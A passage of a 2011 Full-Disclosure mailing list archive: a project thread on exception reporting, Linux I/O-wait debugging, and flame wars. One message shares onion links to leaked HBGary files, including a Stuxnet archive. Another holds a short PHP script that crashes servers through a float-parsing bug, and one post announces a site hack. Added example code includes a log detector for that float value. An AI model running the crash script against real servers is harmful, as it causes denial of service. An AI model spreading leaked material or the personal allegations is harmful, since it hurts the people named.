>>>>> PDF/Anonymous_v2.pdf with list of operations, name, nicknames
>>>>> DOC/Anonymous.docx
>>>>>
>>>>> - Anti-Wikileaks Operations
>>>>> /PPT/WikiLeaks Response v6.pptx
>>>>>
>>>>> - Analysis of security incidents such as Google Aurora Hacking by
>>>>> Chinese Gov, Stuxnet, etc
>>>>>
>>>>> PDF/HBGThreatReport_Aurora.pdf
>>>>> DOC/Aurora_report_v3.docx
>>>>> PPT/Aurora Tech Group.ppt
>>>>>
>>>>> - Stuxnet
>>>>> ZIP/stuxnet.zi_
>>>>>
>>>>>
>>>>
>>>>
>>>>
>>>
>>>
>>
>

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown

2011-02-15 Thread Cal Leeming [Simplicity Media Ltd]
I know right?

First I hold myself back from posting your dox everywhere, and now this!

On Tue, Feb 15, 2011 at 1:06 PM, Benji  wrote:

> Well check you out.
>
>
> On Tue, Feb 15, 2011 at 12:12 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
>
>> Lol, I ain't touching this shit with a barge pole.
>>
>> On Mon, Feb 14, 2011 at 11:05 PM,  wrote:
>>
>>> HI
>>>
>>> i extracted all attachments from the first 3 emails, provided a dump of
>>> all files categorized by type.
>>>
>>> Also you can spread the most significative files on anonymous/wikileaks
>>> that i selected on the web page.
>>>
>>> http://xqz3u5drneuzhaeo.onion/users/hbgary/
>>>
>>> It doesn't include attachment from greg emails.
>>>
>>> It can be also accessed with:
>>>
>>> https://tor-proxy.net/proxy/express/browse.php?u=http%3A%2F%2Fxqz3u5drneuzhaeo.onion%2Fusers%2Fhbgary%2F&b=26
>>> and
>>> https://xqz3u5drneuzhaeo.tor2web.org/users/hbgary/
>>>
>>> - Digital PSYOP / INFOOPS to influence public media in support to US
>>> Government
>>>
>>> PSYOPS Response.doc
>>> PPT/PSYOP Process-1.ppt
>>> PAGES/PSYOPS Response-1.pages
>>>
>>> - Anti Anonymous Operations
>>>
>>> PDF/Anonymous_v2.pdf with list of operations, name, nicknames
>>> DOC/Anonymous.docx
>>>
>>> - Anti-Wikileaks Operations
>>> /PPT/WikiLeaks Response v6.pptx
>>>
>>> - Analysis of security incidents such as Google Aurora Hacking by Chinese
>>> Gov, Stuxnet, etc
>>>
>>> PDF/HBGThreatReport_Aurora.pdf
>>> DOC/Aurora_report_v3.docx
>>> PPT/Aurora Tech Group.ppt
>>>
>>> - Stuxnet
>>> ZIP/stuxnet.zi_
>>>
>>>
>>
>>
>>
>
>

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown

2011-02-15 Thread Cal Leeming [Simplicity Media Ltd]
Lol, I ain't touching this shit with a barge pole.

On Mon, Feb 14, 2011 at 11:05 PM,  wrote:

> HI
>
> i extracted all attachments from the first 3 emails, provided a dump of all
> files categorized by type.
>
> Also you can spread the most significative files on anonymous/wikileaks
> that i selected on the web page.
>
> http://xqz3u5drneuzhaeo.onion/users/hbgary/
>
> It doesn't include attachment from greg emails.
>
> It can be also accessed with:
>
> https://tor-proxy.net/proxy/express/browse.php?u=http%3A%2F%2Fxqz3u5drneuzhaeo.onion%2Fusers%2Fhbgary%2F&b=26
> and
> https://xqz3u5drneuzhaeo.tor2web.org/users/hbgary/
>
> - Digital PSYOP / INFOOPS to influence public media in support to US
> Government
>
> PSYOPS Response.doc
> PPT/PSYOP Process-1.ppt
> PAGES/PSYOPS Response-1.pages
>
> - Anti Anonymous Operations
>
> PDF/Anonymous_v2.pdf with list of operations, name, nicknames
> DOC/Anonymous.docx
>
> - Anti-Wikileaks Operations
> /PPT/WikiLeaks Response v6.pptx
>
> - Analysis of security incidents such as Google Aurora Hacking by Chinese
> Gov, Stuxnet, etc
>
> PDF/HBGThreatReport_Aurora.pdf
> DOC/Aurora_report_v3.docx
> PPT/Aurora Tech Group.ppt
>
> - Stuxnet
> ZIP/stuxnet.zi_
>
>

Re: [Full-disclosure] High performance exception/traceback reporting system

2011-02-14 Thread Cal Leeming [Simplicity Media Ltd]
Oh, having support for XMPP/AMQP would be extremely nice, ideally I'd want
to try and make it compatible with as many different messaging systems as
possible.

On top of this, each supported language would have a library containing
out-of-the-box functions which has every type of messaging/transport option
available. This means the developer can:

   - Choose to use the system out-of-the-box, using the self contained
   messaging system binaries, and simply copy and paste the exception handling
   library / code.

   - Choose to optimize the system by not using the self contained binaries
   (for example, specifying an external database / messaging system to use
   etc).

   - Modify the exception handling code to suit their needs, rather than
   having to write one up from scratch.

As for the fingerprint hashes, this is a really good idea and would make the
reporting aspect very efficient, so I'll be sure to include this.

I'd never heard of SIEM before, after looking on wikipedia I came across
"NitroSecurity" SIEM which sure does look interesting. I'm gonna have a
flick through some of these sites for some inspiration, this may end up
turning into quite a big project!

On Mon, Feb 14, 2011 at 7:54 AM, Daniël W. Crompton <
daniel.cromp...@gmail.com> wrote:

>
> Hi Cal,
>
> I've been thinking of this issue over the weekend and imagined one of the
> solutions to have a messaging system which accepted inputs from different
> languages and transforms these into a report which can be put into a bug
> reporting tool which could use hashes to fingerprint the bugs so you can see
> which are the errors which are causing the most problems.
>
> Sounds like a good plugin for a SIEM too.
>
> D.
>
>
> On 13 February 2011 17:50, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
>
>> Hi,
>>
>> I haven't started development on this yet, I will post the location of the
>> project once I've begun (hopefully next week!)
>>
>> Cal
>>
>>
>> On Sun, Feb 13, 2011 at 4:36 PM, Daniël W. Crompton <
>> daniel.cromp...@gmail.com> wrote:
>>
>>>
>>> Is there any place I can retrieve the code?
>>>
>>> D.
>>>
>>>
>>> On 11 February 2011 18:17, Cal Leeming [Simplicity Media Ltd] <
>>> cal.leem...@simplicitymedialtd.co.uk> wrote:
>>>
>>>> Hey all,
>>>>
>>>> For the last two years, I've been meaning to write a reporting server
>>>> which allows webapps to post their exception tracebacks, which are then
>>>> viewable from a centralized location. After having Thunderbird corrupt my
>>>> mailbox due to over 250 thousand debug emails, this project has now been
>>>> given a bit more priority ;)
>>>>
>>>> The current prototype stores basic exception information (the file path,
>>>> line number, exception type, exception value, originating webapp, node
>>>> hostname etc) in the database, and the traceback details are then
>>>> serialized, dumped into a file, and the path to that file stored against
>>>> the row. A web interface then allows you to browse through these exceptions
>>>> (currently via Django admin), and view them using the same prettified
>>>> exception page which it shows for actual exceptions. This prettified page
>>>> also shows the variables within each frame in the stack, which is very
>>>> handy!
>>>>
>>>> From a developer's point of view, this makes life extremely easy, because
>>>> all your webapps report to a single place, you can do sphinx searches,
>>>> alerts, custom reports etc, and it looks pretty lol.
>>>>
>>>> The entire thing is going to be open source, and will eventually be a
>>>> one-click install with a set up page etc.
>>>>
>>>> Here are some of the features I am planning on adding, but if anyone has
>>>> any suggestions as to what they would like to see in this, please feel free
>>>> to mention them!
>>>>
>>>>    - Tracebacks can be sent to the server primarily via POST request,
>>>>    but custom plugins will allow it to pull in via other means (such as
>>>>    mail attachments)
>>>>    - Alerts can be given different classifications (for example, you
>>>>    could configure specific nodes, webapps, or exception types to alert
>>>>    you via BulkSMS)
>>>>    - Prettified traceback page should initially support Python/PHP,
>&g

Re: [Full-disclosure] High performance exception/traceback reporting system

2011-02-13 Thread Cal Leeming [Simplicity Media Ltd]
Hi,

I haven't started development on this yet, I will post the location of the
project once I've begun (hopefully next week!)

Cal

On Sun, Feb 13, 2011 at 4:36 PM, Daniël W. Crompton <
daniel.cromp...@gmail.com> wrote:

>
> Is there any place I can retrieve the code?
>
> D.
>
>
> On 11 February 2011 18:17, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
>
>> Hey all,
>>
>> For the last two years, I've been meaning to write a reporting server
>> which allows webapps to post their exception tracebacks, which are then
>> viewable from a centralized location. After having Thunderbird corrupt my
>> mailbox due to over 250 thousand debug emails, this project has now been
>> given a bit more priority ;)
>>
>> The current prototype stores basic exception information (the file path,
>> line number, exception type, exception value, originating webapp, node
>> hostname etc) in the database, and the traceback details are then
>> serialized, dumped into a file, and the path to that file stored against the
>> row. A web interface then allows you to browse through these exceptions
>> (currently via Django admin), and view them using the same prettified
>> exception page which it shows for actual exceptions. This prettified page
>> also shows the variables within each frame in the stack, which is very
>> handy!
>>
>> From a developer's point of view, this makes life extremely easy, because
>> all your webapps report to a single place, you can do sphinx searches,
>> alerts, custom reports etc, and it looks pretty lol.
>>
>> The entire thing is going to be open source, and will eventually be a
>> one-click install with a set up page etc.
>>
>> Here are some of the features I am planning on adding, but if anyone has
>> any suggestions as to what they would like to see in this, please feel free
>> to mention them!
>>
>>    - Tracebacks can be sent to the server primarily via POST request, but
>>    custom plugins will allow it to pull in via other means (such as mail
>>    attachments)
>>    - Alerts can be given different classifications (for example, you
>>    could configure specific nodes, webapps, or exception types to alert you
>>    via BulkSMS)
>>    - Prettified traceback page should initially support Python/PHP, other
>>    languages can be added as and when.
>>    - Basic authentication / IP restrictions for the admin login
>>    - Authentication support for when the tracebacks are POST'd to the
>>    server
>>    - Tar source should pre-package a lightweight nginx/uwsgi/python
>>    environment, so it is self sufficient (this will need to be security
>>    maintained obviously).
>>    - A nice, pretty, easy to use interface, because this just makes
>>    people feel all nice and warm inside ^_^
>>
>> I don't want to go as far as to say that it should be used to collect
>> error_log outputs, I think that would be going a bit too far, the main
>> reason for having a system like this is simply due to the sheer amount of
>> information usually contained within a traceback dump, and the Django
>> prettifier makes it so much easier to debug with!
>>
>> Thoughts/criticisms welcome!
>>
>> Cal
>>
>>
>
>
>
> --
> blaze your trail
>
> --
> Daniël W. Crompton 
>
> http://specialbrands.net/
> <http://twitter.com/webhat> 
> <http://www.facebook.com/webhat><http://plancast.com/webhat><http://www.linkedin.com/in/redhat>
>
>

Re: [Full-disclosure] High performance exception/traceback reporting system

2011-02-11 Thread Cal Leeming [Simplicity Media Ltd]
Certainly having support for C++ would be great, but I know sweet FA when it
comes to coding in C/C++, so this may be the perfect time to learn lol.

Your suggestions for having hotlinks back to component information is pretty
hot. On the actual traceback view itself, I'm thinking of having a filter
section at the top which lets you expand/show/hide specific information
(such as frame variables, cast types vs str() wrapped display etc).

I had a look at django-sentry, but it is nowhere near what I envisaged the
end result to be.

For me, the most important thing is to make this system easily deployable,
self contained, and to have an interface/feature set which focuses on what's
best for a developer, not a manager (possibly in the future, it may have a
'managers' view which lets you see a business impact overview of all the
exceptions etc).

On Fri, Feb 11, 2011 at 7:55 PM, coderman  wrote:

> On Fri, Feb 11, 2011 at 11:51 AM, coderman  wrote:
> > On Fri, Feb 11, 2011 at 9:17 AM, Cal Leeming [Simplicity Media Ltd]
> >  wrote:
> >> ... current prototype stores basic exception information (the file path,
> >> line number, exception type, exception value, originating webapp, node
> >> hostname etc) ...
>
> implicit in my last reply is language agnostic exception reporting, or
> at least c++ support in addition to python/ruby/php/whatever ;)
>

[Full-disclosure] High performance exception/traceback reporting system

2011-02-11 Thread Cal Leeming [Simplicity Media Ltd]
Hey all,

For the last two years, I've been meaning to write a reporting server which
allows webapps to post their exception tracebacks, which are then viewable
from a centralized location. After having Thunderbird corrupt my mailbox due
to over 250 thousand debug emails, this project has now been given a bit
more priority ;)

The current prototype stores basic exception information (the file path,
line number, exception type, exception value, originating webapp, node
hostname etc) in the database, and the traceback details are then
serialized, dumped into a file, and the path to that file stored against the
row. A web interface then allows you to browse through these exceptions
(currently via Django admin), and view them using the same prettified
exception page which it shows for actual exceptions. This prettified page
also shows the variables within each frame in the stack, which is very
handy!

From a developer's point of view, this makes life extremely easy, because all
your webapps report to a single place, you can do sphinx searches, alerts,
custom reports etc, and it looks pretty lol.

The entire thing is going to be open source, and will eventually be a
one-click install with a set up page etc.

Here are some of the features I am planning on adding, but if anyone has any
suggestions as to what they would like to see in this, please feel free to
mention them!

   - Tracebacks can be sent to the server primarily via POST request, but
   custom plugins will allow it to pull in via other means (such as mail
   attachments)
   - Alerts can be given different classifications (for example, you could
   configure specific nodes, webapps, or exception types to alert you via
   BulkSMS)
   - Prettified traceback page should initially support Python/PHP, other
   languages can be added as and when.
   - Basic authentication / IP restrictions for the admin login
   - Authentication support for when the tracebacks are POST'd to the server
   - Tar source should pre-package a lightweight nginx/uwsgi/python
   environment, so it is self sufficient (this will need to be security
   maintained obviously).
   - A nice, pretty, easy to use interface, because this just makes people
   feel all nice and warm inside ^_^

I don't want to go as far as to say that it should be used to collect
error_log outputs, I think that would be going a bit too far, the main
reason for having a system like this is simply due to the sheer amount of
information usually contained within a traceback dump, and the Django
prettifier makes it so much easier to debug with!

Thoughts/criticisms welcome!

Cal
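
An added example, not written by any poster in this thread and not the project's code: the report fields listed in the post above, the fingerprint hash suggested in Daniël's reply earlier on this page, and authentication of POSTed tracebacks, done here with an HMAC-SHA256 shared key. All names, the key and the sample exceptions are constructed; leaving line numbers and the exception value out of the fingerprint is an assumption of this example.

```python
import hashlib
import hmac
import json
import traceback
from collections import Counter

# Constructed shared secret; a real deployment would issue one per webapp.
SHARED_KEY = b"example-key-not-a-real-secret"


def fingerprint(exc):
    """Hash the exception type plus the (file, function) of every frame.

    Line numbers and the exception value are excluded (assumption of this
    example): both change between occurrences of the same bug.
    """
    frames = traceback.extract_tb(exc.__traceback__)
    parts = [type(exc).__name__] + [f"{f.filename}:{f.name}" for f in frames]
    return hashlib.sha256("\n".join(parts).encode()).hexdigest()


def build_report(exc, webapp, node):
    """Collect the fields the prototype stores, plus the fingerprint."""
    last = traceback.extract_tb(exc.__traceback__)[-1]
    return {
        "webapp": webapp,
        "node": node,
        "file": last.filename,
        "line": last.lineno,
        "type": type(exc).__name__,
        "value": str(exc),
        "fingerprint": fingerprint(exc),
    }


def sign(body, key=SHARED_KEY):
    """HMAC-SHA256 over the exact bytes that are POSTed."""
    return hmac.new(key, body, hashlib.sha256).hexdigest()


class Collector:
    """Server side: authenticate each report, then group by fingerprint."""

    def __init__(self, key=SHARED_KEY):
        self.key = key
        self.counts = Counter()
        self.latest = {}

    def ingest(self, body, signature):
        expected = sign(body, self.key).encode()
        # Constant-time comparison; reject before parsing untrusted JSON.
        if not hmac.compare_digest(expected, signature.encode()):
            return False
        report = json.loads(body)
        fp = report["fingerprint"]
        self.counts[fp] += 1
        self.latest[fp] = report
        return True

    def worst(self, n=5):
        """(type, file, occurrences) for the most frequent fingerprints."""
        return [(self.latest[fp]["type"], self.latest[fp]["file"], count)
                for fp, count in self.counts.most_common(n)]


# --- constructed sample webapp code that fails in two different ways ---
def lookup_user(users, uid):
    return users[uid]      # KeyError for unknown ids


def parse_port(text):
    return int(text)       # ValueError for non-numeric input


def capture(func, *args):
    try:
        func(*args)
    except Exception as exc:
        return exc


def demo():
    collector = Collector()
    events = [capture(lookup_user, {}, 7),
              capture(lookup_user, {}, 99),
              capture(parse_port, "http")]
    for exc in events:
        report = build_report(exc, webapp="shop", node="web01")
        body = json.dumps(report, sort_keys=True).encode()
        collector.ingest(body, sign(body))
    # A report signed with the wrong key must not reach the counters.
    forged = json.dumps({"fingerprint": "0" * 64, "type": "X", "file": "x"}).encode()
    rejected = not collector.ingest(forged, sign(forged, b"wrong-key"))
    return collector, rejected


if __name__ == "__main__":
    collector, rejected = demo()
    print(collector.worst(), "forged report rejected:", rejected)
```

The two `KeyError` reports carry different exception values but collapse into one fingerprint, which is what lets the collector rank bugs by frequency.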

Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

2011-02-10 Thread Cal Leeming [Simplicity Media Ltd]
Andrew, I'm gonna tell you the same thing my girl tells me when I'm being
a cunt. You need a fucking slap. lol.

On Thu, Feb 10, 2011 at 5:39 PM, Christian Sciberras wrote:

> One question. Who's "you" that you keep referring to all the time?
>
>
>
>
> On Thu, Feb 10, 2011 at 5:44 PM, andrew.wallace <
> andrew.wall...@rocketmail.com> wrote:
>
>> Thankfully you are very rarely involved with public and private sector
>> business talks in the UK, so the situation will probably never arise we are
>> in the same board room.
>>
>> Stay in America and keep away from the UK is the best thing that could
>> ever happen to you, because frankly meeting you would be a complete
>> nightmare for me and I would find it hard to work with you on any meaningful
>> level.
>>
>> One thing for sure is you have pissed me off with the way you speak to me
>> via private email and your perceived perception of who I am, and what you
>> think n3td3v is.
>>
>> Maybe in the beginning it seemed like disorganised nonsense to you, but
>> it has evolved and shaped over the years with me and is now a serious force
>> to be reckoned with and is able to compete with other consultancy
>> organisations in the UK, now that there are serious consultants on board
>> from the business and government sector in the UK, where we work on
>> meaningful policy reform within organisations, to tighten security against
>> foreign powers, terrorist attacks and other matters.
>>
>> To be perfectly honest, I would like to say, I think you've been reading
>> mailing lists too much, a lot more goes on in industry than the stupid
>> disclosure community, work actually gets done that is meaningful and
>> satisfying when I come home at night.
>>
>> My advice to you is, stop reading mailing lists, get on with the physical
>> industry and stop basing your views of people based on back and forward
>> horse play people have had between 2004-2009.
>>
>> That part of n3td3v is behind you, me and everyone, I removed the mailing
>> list as a symbolic gesture to move on from that.
>>
>> I'm now a professional, consulting and liaising with other consultants in
>> the UK in the public and private sector through the consortium, the
>> consultants who I've had dealings with in the physical domain who have
>> decided to join through knowing me in a working relationship.
>>
>> The organisation is nothing to do with what it might have been, n3td3v is
>> rethought and matured, along with me.
>>
>> You couldn't possibly say the same organisation I started when I was 18 is
>> going to be the same organisation today now that I'm 30, it isn't.
>>
>> I've changed, we've changed, the type of people I come into contact has
>> changed through opportunities I've gained in the physical domain.
>>
>> n3td3v is very much nothing to do with anything online-based, but has
>> shifted into the physical domain, in that, its people I actually know who I
>> can shake hands with who are members.
>>
>> That is why the name was changed, the brand, its now a consortium, its
>> nothing to do with online or some silly Google group mailing list.
>>
>> The beginning days of n3td3v between 2004-2009 and the Google group
>> mailing list was used to push my name out into the industry to become known,
>> you should be able to work with me in a meaningful working relationship if
>> you ever had to through work commitments.
>>
>>
>> Everyone else who I meet in the physical domain knows who I am, but they
>> don't judge me for it, they shake my hand and move on with the problems in
>> the industry that are needing solved.
>>
>> They don't say, that's Andrew who used to post in the disclosure
>> community, let's huff and puff about it.
>>
>> They take me as I am in the physical domain, realise it was silly horse
>> play from the past and move on.
>>
>> I hope you are able to do the same, because your attitude just annoys me
>> that you cannot have a mature and professional approach in the way you talk
>> with me.
>>
>> Andrew
>>
>>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] {Java,PHP} Server Exploits

2011-02-09 Thread Cal Leeming [Simplicity Media Ltd]
Christian, this issue has been 'floating' around for several months now.

On Wed, Feb 9, 2011 at 7:56 PM, Christian Sciberras wrote:

> Ah, been reading more about it, seems it was fixed.
>
> Still, there should have been safeguards around this - I'm thinking they
> should check existing conversion routines to ensure they're safe...
>
>
>
>
> On Wed, Feb 9, 2011 at 8:54 PM, Christian Sciberras wrote:
>
>> Was it fixed? What's the current status?
>>
>> This sounds like a major issue, and the lack of info about it is darn
>> impressive.
>>
>>
>> I tried it on my test Windows WAMP server:
>>
>> <?php
>> ob_implicit_flush(true);
>>
>> echo 'Start test...';
>>
>> $f=(float)"2.2250738585072011e-308";
>> echo 'Try 1 => '.$f.'';
>>
>> $f=floatval("2.2250738585072011e-308");
>> echo 'Try 2 => '.$f.'';
>>
>> $f="2.2250738585072011e-308";
>> echo 'Try 3 => '.(float)$f.'';
>>
>> echo 'Test failed, server not vulnerable!';
>>
>> ?>
>>
>> All three tests succeeded in crashing the server.
>>
>> With all due respect, this should NOT have been disclosed without being
>> FIXED (as it seems to me).
>> Plus, I'm a bit amazed such a bug exists in PHP - since converting to
>> floating point is a trivial operation, it should have been limited and
>> safe-guarded from the start.
>> There are a lot of servers out there happily accepting input as floating
>> point values, this bug should be top priority...
>>
>>
>> Chris.
>>
>>
>>
>> On Wed, Feb 9, 2011 at 6:40 PM, Leon Kaiser  wrote:
>>
>>>
>>> http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers
>>>
>>> http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server
>>>
>>>
>>>
>>
>>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
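
Added example, not part of the thread: a log-triage check, in Python, for the literal used in the quoted test script. It normalises a decimal string so the same value is recognised when the decimal point is shifted or zeros are padded; it matches only that one literal, so it does not replace patching. The request lines and the calc.php/amount/qty names are constructed.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# sign, integer digits, optional fraction, optional exponent
LITERAL_RE = re.compile(r"[+-]?(\d*)\.?(\d*)(?:[eE]([+-]?\d+))?")


def normalise(text):
    """Return (significant_digits, scientific_exponent) or None if not a decimal literal."""
    text = text.strip()
    if len(text) > 4096:          # bound the work; oversized numeric fields need their own alert
        return None
    m = LITERAL_RE.fullmatch(text)
    if not m or not (m.group(1) or m.group(2)):
        return None
    exp_text = m.group(3) or "0"
    if len(exp_text) > 6:         # absurd exponents are not the value we look for
        return None
    frac = m.group(2)
    digits = (m.group(1) + frac).lstrip("0")
    if not digits:
        return ("0", 0)
    exp10 = int(exp_text) - len(frac)      # value == int(digits) * 10**exp10
    sig = digits.rstrip("0")
    exp10 += len(digits) - len(sig)        # trailing zeros move into the exponent
    return sig, exp10 + len(sig) - 1       # exponent of the form d.ddd * 10**n


# The literal from the test script quoted in this thread.
TARGET = normalise("2.2250738585072011e-308")


def suspicious_params(request_target):
    """List (name, value) query parameters whose value equals TARGET in any notation."""
    query = urlsplit(request_target).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if normalise(v) == TARGET]


def flag_requests(request_targets):
    """Return (request_target, hits) for every request carrying the literal."""
    flagged = []
    for target in request_targets:
        hits = suspicious_params(target)
        if hits:
            flagged.append((target, hits))
    return flagged


# Constructed request targets, as they would appear in an access log.
SAMPLE_REQUESTS = [
    "/calc.php?amount=19.99&qty=3",
    "/calc.php?amount=2.2250738585072011e-308",
    "/calc.php?amount=0.00022250738585072011e-304&qty=1",
    "/calc.php?qty=2&amount=22250738585072011E-324",
    "/calc.php?amount=2.2250738585072014e-308",   # a different value, not flagged
]

if __name__ == "__main__":
    for target, hits in flag_requests(SAMPLE_REQUESTS):
        print(target, "->", hits)
```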

Re: [Full-disclosure] Mr. Lemming

2011-02-08 Thread Cal Leeming [Simplicity Media Ltd]
Andrew, go fuck yourself :)

On Wed, Feb 9, 2011 at 2:12 AM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Tue, Feb 8, 2011 at 2:55 PM,   wrote:
> > Quite frankly Andrew, I neither know nor care if Cal is an ex-blackhat.
>
> The fact that you state that you don't have a clue who he is and don't care
> shows a vulnerability in your secure-thinking, not only that it opens up to
> the fact that you're probably a really good target for spear-engineering of
> you socially, but perhaps that you would even be vulnerable to entrapment or
> blackmail.
>
> Andrew
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] "IO wait chains" in Linux??

2011-02-07 Thread Cal Leeming [Simplicity Media Ltd]
Hmm, I'd never heard of any of those before, I'll check them out.

Haven't really got an end goal, it's more of a learning curve trying to
teach myself some of the fundamentals about how the kernel works, and
sharing what I find.

That, and IO wait / deadlocking was the bane of my existence for the entire
of 2010 whilst attempting to try out technologies such as DRBD, XFS, OCFS2
in a HA environment :/

On Mon, Feb 7, 2011 at 11:19 PM, coderman  wrote:

> On Mon, Feb 7, 2011 at 12:06 PM,   wrote:
> > ...
> > So the big question is "what you're trying to accomplish" rather than "is there
> > a CLI tool that does XYZ" - most of the problems won't be found by checking for
> > XYZ at all...
>
> he may want more kernel land visibility, in which case kernel
> profiling, oprofile, kprobes are what you seek.
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Mr. Lemming

2011-02-07 Thread Cal Leeming [Simplicity Media Ltd]
Andrew, are you in some way suggesting that if another person engages in
conversation with me, that it will be frowned upon and/or cause them
problems?

If so, maybe you should go and give this same advice to the list of people
I've worked with on my linkedin profile, and watch how quickly you are told
to go and do one.

It is exactly this kind of narrow minded, stereotypical thinking that
alienates those with real talent, but a troubled history.

On Tue, Feb 8, 2011 at 12:06 AM, coderman  wrote:

> On Mon, Feb 7, 2011 at 3:54 PM, andrew.wallace
>  wrote:
> > The point is, should you be giving him "tips" on such a publicly accessible
> > platform?
>
>
> full-disclosure - supporting the dissemination of sufficient knowledge
> for intelligent decision making.
>
> i could care less about the irrelevant particulars of someones
> personal history in technical discussions. the ethical implications of
> how someone uses information (or tools, or any other resource) is a
> separate subject from the rationale for having a technical discussion
> on this list.
>
> and supporting technical discussions of any type, regarding any
> technologies, or any vulnerabilities, i fully encourage.
>
> using these discussions for ethical purposes i also encourage,
> however, that is something completely beyond my control.
>
>
> P.S. if you'd like to discuss the ethical reasoning of a
> full-disclosure advocate we can do so off list. however, the set of
> individuals capable of a reasonable discussion on ethics is very small
> and unlikely to intersect with the set of individuals on this mailing
> list, let alone one with the moniker "n3td3v". ;)
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] jaillords.com hacked, login/password/email list

2011-02-07 Thread Cal Leeming [Simplicity Media Ltd]
Was it *really* necessary to post the SQL dump publicly? :S

On Mon, Feb 7, 2011 at 11:58 PM, Bob Smith <
bobbyhadababyitsa...@googlemail.com> wrote:

> Weak passwords, no brute force protection,  lots of sql injections,
> was easy to take full control of site
>
> Heres the password files
>
>
> admins fix ur shit or we will be back
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Mr. Lemming

2011-02-07 Thread Cal Leeming [Simplicity Media Ltd]
Andrew, why on earth would you post this?

You could have at least tried to spell my name correctly :S

On Mon, Feb 7, 2011 at 11:46 PM, coderman  wrote:

> i am an ex-third-shift-stocker. look me up one day. i was fired for
> stealing a soda pop.
>
> what's the point n3td3v?  i keep holding hope you may one day, ONE
> DAY! post something with even a grain of usefulness.
>
> yet another year, i wait...
>
> (it's been what, three, four years of your inanity?)
>
>
> On Mon, Feb 7, 2011 at 3:38 PM, andrew.wallace
>  wrote:
> > Cal lemming is an ex-blackhat. Look him up one day, he was jailed for credit
> > carding.
> >
> > Andrew
> >
> > http://sites.google.com/site/n3td3v/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] "IO wait chains" in Linux??

2011-02-07 Thread Cal Leeming [Simplicity Media Ltd]
Thank you for your detailed reply!

Here's the kinda thing I was looking for (this is just a mockup):

21000 - /usr/local/sbin/nginx - [D]
  - /tmp/.somefile
    - other PIDs waiting on this file (not just children of the parent)
      - 51283 - /usr/local/sbin/apache (4.6 seconds)
      - 31028 - /usr/local/sbin/python2.6 (1.9 seconds)

Sadly, I don't know much about how the kernel and the IO schedulers handle
these things behind the scenes, so what I'm asking for may be impossible
(apart from your other suggestion using watchdog+dmesg).

On Mon, Feb 7, 2011 at 4:28 PM,  wrote:

> On Mon, 07 Feb 2011 06:41:53 GMT, "Cal Leeming [Simplicity Media Ltd]"
> said:
>
> > Is anyone aware of a Linux based CLI equivalent, which will show the
> > processes stuck in IO wait, in a tree format?
>
> ps ax | grep ' [D] '   gives a pretty good approximation of "currently in
> I/O wait". But remember that each process (or actually, each thread within
> a process) can individually be stuck in I/O wait, so it's unclear what the
> "tree format" would consist of, exactly.  If you have a process that has
> parent, siblings, and children, what else would show up in the tree if it's
> in an I/O wait?
>
> There's the slightly more difficult issue that if you're trying to do
> system-level analysis, you're looking at really bad race conditions.
> Processes often go into and leave I/O wait status in literally
> milliseconds.  At best, you can run through the process list several times
> and get a statistical view of "these 4 processes are in I/O wait most of
> the time".  'pstree' mostly avoids that issue because if the system is
> small enough that the pstree output is still useful, the fork/exec rate is
> low enough that pstree can mostly ignore it.  That's not true for I/O.
>
> If you're trying to identify processes that are truly and literally *stuck*
> in I/O wait due to a hardware or kernel error, you're probably better off
> enabling the watchdog timer in the kernel and watching dmesg for it
> triggering.
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
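
Added example, not from the thread: the repeated-sampling approach described in the quoted reply, in Python. It walks /proc several times, records every thread in state D together with its wchan (the kernel function it is sleeping in), and ranks threads by the share of samples spent blocked; it does not attempt the per-file view from the mockup. All function names are this example's own.

```python
import os
import time
from collections import Counter


def parse_stat(line):
    """Parse a /proc/<pid>/task/<tid>/stat line into (tid, comm, state, ppid).

    comm is wrapped in parentheses and may itself contain spaces or ')',
    so split on the LAST ')' rather than on whitespace.
    """
    lpar, rpar = line.index("("), line.rindex(")")
    rest = line[rpar + 1:].split()
    return int(line[:lpar]), line[lpar + 1:rpar], rest[0], int(rest[1])


def snapshot(proc_root="/proc"):
    """Return {tid: (pid, comm, wchan)} for every thread currently in state D."""
    blocked = {}
    for pid in filter(str.isdigit, os.listdir(proc_root)):
        task_dir = os.path.join(proc_root, pid, "task")
        try:
            tids = os.listdir(task_dir)
        except OSError:
            continue  # process exited while we were walking /proc
        for tid in tids:
            try:
                with open(os.path.join(task_dir, tid, "stat")) as fh:
                    _, comm, state, _ = parse_stat(fh.read())
            except (OSError, ValueError, IndexError):
                continue  # thread vanished or the line was unreadable
            if state != "D":
                continue
            try:
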